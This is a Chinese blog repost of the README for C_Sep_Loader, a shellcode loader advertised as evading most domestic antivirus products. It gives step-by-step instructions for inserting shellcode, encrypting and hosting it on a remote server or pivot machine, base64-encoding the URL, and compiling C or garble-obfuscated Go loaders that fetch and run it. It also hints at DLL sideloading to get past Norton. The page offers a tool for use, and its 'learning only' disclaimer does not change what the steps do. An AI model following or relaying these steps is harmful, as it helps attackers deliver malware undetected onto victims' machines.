首页 渗透工具 正文
  • 本文约821字,阅读需4分钟
  • 50
  • 0

C_Sep_Loader

Introduce

一个简单的远程分离的加载器,免杀国内大部分杀软

How to use

C版本

修改Encryption/payload_c_x64.py的24行,改为自己的shellcode

运行python脚本(环境python3.6)

将生成的result.txt上传到Web端(Oss,跳板等机器)

copy自己的地址如http://example.org 并进行base64编码

将http://example.org_base64 替换 ShellCodeLoader/Source.c 的170行,生成64位发行版即可

Go版本

修改Encryption/payload_c_x64.py的24行,改为自己的shellcode

运行python脚本(环境python3.6)

将生成的result.txt上传到Web端(Oss,跳板等机器)

copy自己的地址如http://example.org 并进行base64编码

Go1.20以上,Garble,进入Go_Sep_Loader目录下使用garble进行编译

garble -seed=random build main.go

生成出main.exe,使用方法为带参运行e.g.

main.exe 5L2g5ZKL5Zue5LqL5bCP5LyZ5a2Q5oOz5bmy5Zib(base64编码过的地址)

Log

2024.6.20 小更一下,摸会鱼,增加了一层url_base64编码,后续有时间再更。

2024.6.29 使用go重构项目,采用分离加载,原理同C版本。 image image image

诺顿动态还是不得行,建议白加黑(埋个小坑)

image image

勉强能用

Ps

此项目为开源项目,仅提供与学习。项目样本会在公开前由本人扔沙箱,请勿用于违法行为,造成的违法行为与本人无关;如转载请标明出处,请勿商用,请勿商用,请勿商用!!!

菜鸡本人的垃圾项目,未添加反调试反沙箱等代码,因而不保证其免杀时效。

issus暂不解答免杀的问题,技术讨论可以提issus,求抱大佬大腿.jpg.

温馨提示:本文最后更新于2024年6月13日 01:37,若内容或图片失效,请在下方留言或联系博主。
评论
更换验证码